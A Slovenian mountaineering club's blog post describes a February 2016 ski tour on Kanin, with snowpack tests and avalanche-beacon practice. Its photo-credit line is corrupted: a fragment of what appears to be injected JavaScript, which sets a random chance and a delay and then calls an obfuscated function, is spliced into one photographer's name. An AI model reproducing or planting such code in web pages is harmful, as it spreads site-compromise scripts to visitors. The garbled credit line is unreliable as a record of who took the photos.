Kanin

Written by Tadej

February 16, 2016

 

V soboto sem skupaj s Tolminci odpravil na Kanin. Glede na slabe napovedi, smo imeli namen malo vaditi za izpite, če se bo dalo pa tudi kaj smučati. Nagrajeni smo bili s prelepim dnevom in pravo zimsko idilo. Cela Primorska se je kopala v megli, mi pa smo uživali na soncu.

S terencem smo se vzpeli še malo nad B postajo, nato nadaljevali na smučeh. Vzpon nam je precej olajšal teptalec, s katerim so se na smučišče povzpeli vzdrževalci, saj je bila zaradi njega cesta dobro steptana.  Povzpeli smo se do D postaje, pomalicali in se zaradi dokaj visokih temperatur, hitro spustili proti C-ju. V zgornjem delu smo bili nagrajeni še z relativno suhim pršičem, malo nad C postajo pa so se že kar poznale visoke temperature in je bil sneg že malo težji.  Za vajo smo naredili prerez snežne odeje, in nekaj testov stabilnosti. Ponovno smo se povzpeli do Skripija, tam opravili še nekaj iskanj z žolno, ter nato odsmučali dolino, pod C-jem najprej po zratrakirani cesti, nižje pa skozi gozd.  Smuka je bila najboljša letos, tista prava sezona se je končno začela.
Kako lepo je bilo, pa naj povejo slike same.
Foto: Simon Čopi, Sandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andro Krajnik, Peter Tončič, Tadej Slokar

Categories

Archives

You May Also Like…

Bivakiranje in Mali draški vrh

Bivakiranje in Mali draški vrh

V sklopu alpinistične šole, je v soboto 25.2.2023 prišel dan za turo z bivakiranjem. Glede na bolj slabo vremensko...

0 Comments

Submit a Comment